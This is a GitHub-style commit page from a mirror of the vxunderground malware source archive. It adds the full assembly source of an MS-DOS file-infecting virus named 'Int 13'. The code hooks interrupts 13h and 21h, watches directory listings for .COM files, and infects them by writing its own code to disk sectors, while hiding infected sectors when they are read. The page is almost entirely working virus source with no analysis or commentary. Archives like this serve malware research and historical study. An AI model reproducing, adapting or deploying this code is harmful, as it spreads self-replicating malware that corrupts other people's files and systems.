daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:47:04 -06:00
committed by GitHub
parent dda6c7045d
commit a2f096eccc
99 changed files with 48627 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.int13.asm
+310
View File
@@ -0,0 +1,310 @@
Code Segment
Assume CS:Code
Old13 = 9Ch
True13 = 9Dh
Saved21 = 9Eh
Temp13 = 9Fh
VStart: loop Next ; Virus ID
Next: push ax
mov di,13h * 4
push di
xor bp,bp
mov ds,bp
les bx,[di]
mov di,True13 * 4
mov [di-4],bx
mov [di-2],es
mov ah,13h
int 2Fh
push es
push bx
int 2Fh
mov es,bp
mov si,21h * 4
pop ax
stosw
pop ax
stosw
push si
movsw
movsw
mov ah,52h
int 21h
push es
pop ds
les ax,[bx+12h] ; ax is now 0000h, i.e. ah is 0.
push word ptr es:[bp+2]
mov si,100h
mov cx,si
mov di,bp
push si
rep movs word ptr es:[di], cs:[si]
pop si
pop word ptr ds:[bx+14h]
push es
mov al, offset Continue ; Let's use it!
push ax
retf
SavedCX dw 1
SavedDX dw 0
SavedBX dw 0
SavedES dw 0
FileWord dw 0
SCX = offset SavedCX - offset VStart
SDX = offset SavedDX - offset VStart
Continue: mov es,bp
pop di
mov al,offset Int21 ; Two times!
stosw
mov es:[di],cs
pop di
mov al,offset Int13 ; Three times!
stosw
mov es:[di],cs
mov es,[bp+2Ch] ; This assumes SS:
mov di,bp
xchg ax,bp
dec cx
ScanEnv: repne scasb
scasb
jnz ScanEnv
scasw
push es
pop ds
mov dx,di
mov ah,3Dh
int 21h
jc NoStart
mov dx,si
xchg ax,bx
mov ah,3Fh
push ss
pop ds
int 21h
mov ah,3Eh
int 21h
pop ax
push ss
push si
push ss
pop es
retf
NoStart: mov ah,4Ch
int 21h
Int13V: mov SavedBX,bx
mov SavedCX,cx
mov SavedDX,dx
mov SavedES,es
Go13: int Old13
jmp short RetF2
Int13: cmp ah,2
jne Go13
push ds
push si
push di
push cx
push dx
push es
push bx
push dx
int Old13
pop dx
jc Exit13
cmp word ptr es:[bx],00E2h
clc
jne Exit13
mov ax,202h
mov cx,es:[bx+SCX]
mov dh,byte ptr es:[bx+SDX+1]
mov bx,0B800h
mov ds,bx
mov es,bx
mov bh,78h
int True13
jc Exit13
mov si,7A00h
pop bx
mov di,bx
pop es
mov cx,100h
rep movsw
jmp short Exit13_1
Exit13: pop bx
pop es
Exit13_1: pop dx
pop cx
pop di
pop si
pop ds
RetF2: retf 2
Int21: cmp ah,12h
je FindNext
int Saved21
jmp RetF2
FindNext: int Saved21
cmp al,0
jnz RetF2
push ax
push bx
push ds
push es
mov ah,2Fh
int Saved21
push es
pop ds
mov ax,'MO'
cmp ax,[bx+17]
jne Exit1
cmp ax,[bx+9]
je Exit1
mov al,[bx+7]
add al,'@'
push cx
push dx
mov cx,[bx+36]
mov dx,200h
cmp cx,dx
jb Exit2
dec cx
test ch,10b
jz Infect
cmp al,'C'
jb Exit2
test ch,100b
jz Infect
Exit2: pop dx
pop cx
Exit1: pop es
pop ds
pop bx
pop ax
jmp RetF2
Infect: push si
push di
push cs
pop es
mov di,dx
lea si,[bx+8]
mov ah,':'
stosw
movsw
movsw
movsw
movsw
mov al,'.'
stosb
movsw
movsb
xor ax,ax
stosb
mov ds,ax
mov es,ax
mov si,13h * 4
mov di,Temp13 * 4
push si
push di
push es
movsw
movsw
mov word ptr [si-4], offset Int13V
mov [si-2], cs
push cs
pop ds
mov ah,3Dh
int Saved21
xchg ax,bx
mov ax,4202h
mov cx,-1
mov dx,cx
int Saved21 ; DX must now be zero (.COM)
Go: mov ah,3Fh
mov dl,offset FileWord
mov di,dx
neg cx ; mov cx,1
int Saved21
push [di-8]
push [di-6]
mov ax,4200h
xor cx,cx ; can it be inc cx ??
xor dx,dx
int Saved21
mov ah,3Fh
mov dx,di
mov cl,2
int Saved21
mov ax,[di]
pop dx
pop cx
cmp ax,00E2h
je Close
cmp ax,5A4Dh
je Close
mov ax,202h
push cx
push dx
mov bx,0B800h
mov es,bx
mov bh,78h
int True13
lds si,[di-4]
push di
mov di,7A00h
mov cx,100h
rep movsw
pop di
mov ax,302h
pop dx
pop cx
push cx
push dx
int True13
pop dx
pop cx
mov ax,301h
xchg cx,cs:[di-8]
xchg dx,cs:[di-6]
push cs
pop es
xor bx,bx
int True13
Close: mov ah,3Eh
int Saved21
pop es
pop si
pop di
movs word ptr es:[di], es:[si]
movs word ptr es:[di], es:[si]
pop di
pop si
jmp Exit2
VName db ' Int 13'
VEnd label byte
VLen = offset VEnd - offset VStart
Code EndS
End VStart